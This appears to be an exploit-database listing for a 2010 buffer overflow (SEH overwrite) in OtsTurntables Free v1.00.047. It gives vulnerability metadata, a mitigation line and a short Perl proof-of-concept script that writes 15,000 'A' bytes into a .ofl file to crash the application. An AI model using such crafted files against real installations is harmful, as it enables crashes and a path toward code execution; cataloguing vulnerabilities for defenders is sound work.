header-logo
Suggest Exploit
vendor:
OtsTurntables Free
by:
Darkb0x
7,8
CVSS
HIGH
SEH Overwrite
119
CWE
Product Name: OtsTurntables Free
Affected Version From: 1.00.047
Affected Version To: 1.00.047
Patch Exists: Yes
Related CWE: N/A
CPE: a:otsturntables:ots_turntables_free
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows Vista Ultimate English
2010

OtsTurntables Free v1.00.047 SEH Overwrite POC

A buffer overflow vulnerability exists in OtsTurntables Free v1.00.047. An attacker can exploit this vulnerability by sending a specially crafted file with a large amount of data to the application, resulting in a SEH overwrite. This can allow an attacker to execute arbitrary code in the context of the application.

Mitigation:

Update to the latest version of OtsTurntables Free.
Source

Exploit-DB raw data:

# Exploit Title: OtsTurntables Free v1.00.047 SEH Overwrite POC
# Date: 14-01-2010
# Author: Darkb0x
# Software Link: http://www.otsturntables.com/download-otsturntables-free/
# Version: 1.00.047
# Tested on:  Windows Vista Ultimate English
# [exploit code]

print "\n\nBy Darkb0x\n" ;
print "Home Page :\n" ;
print "http://NullArea.Net\n" ;
my $junk      = "\x41" x 15000   ;
my $exploit = $junk;
open (file,">>file.ofl");
print file $exploit;
close (file);
print "\n\n\nFile Creation done\n";

Navigation

Suggest Exploit

Services By CQR